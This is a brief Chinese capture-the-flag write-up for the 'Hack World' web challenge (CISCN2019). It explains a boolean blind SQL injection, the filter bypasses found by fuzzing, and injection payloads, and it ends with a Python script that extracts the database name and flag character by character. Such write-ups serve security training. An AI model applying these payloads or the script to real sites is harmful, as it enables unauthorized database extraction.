[CISCN2019 华北赛区 Day2 Web1]Hack World 1
经过测试为布尔盲注
此例不使用二分法 经过fuzzing测试
ascii没有被过滤,substr也没有!!空格被过滤可以使用()代替,,<>也没有被过滤,=也没有
爆数据库 payload
(ascii(substr(database(),%d,1))=%d)
其中%d为变量
题目提示在flag表中flag字段就是我们想要的东西
构造payload
data = {
"id": "(ascii(substr((select(flag)from(flag)),%d,1))=%d)" % (i, j)}
编写python自动化攻击脚本
import requests
url = "http://7bfecddb-1daa-49b4-bec9-49bdc10155d7.node3.buuoj.cn/index.php"
flag = 'Hello, glzjin wants a girlfriend.'
final = ""
for i in range(1, 100):
stop = 0
for j in range(32, 129):
stop = j
data = {
"id": "(ascii(substr(database(),%d,1))=%d)" % (i, j)}
# data = {"id": "(ascii(substr((select(flag)from(flag)),%d,1))=%d)" % (i, j)}
re = requests.post(url, data=data).text
if flag in re:
final += chr(j)
print(final)
break
if stop >= 128:
print("*" * 50)
print(final)
break
执行脚本 得到flag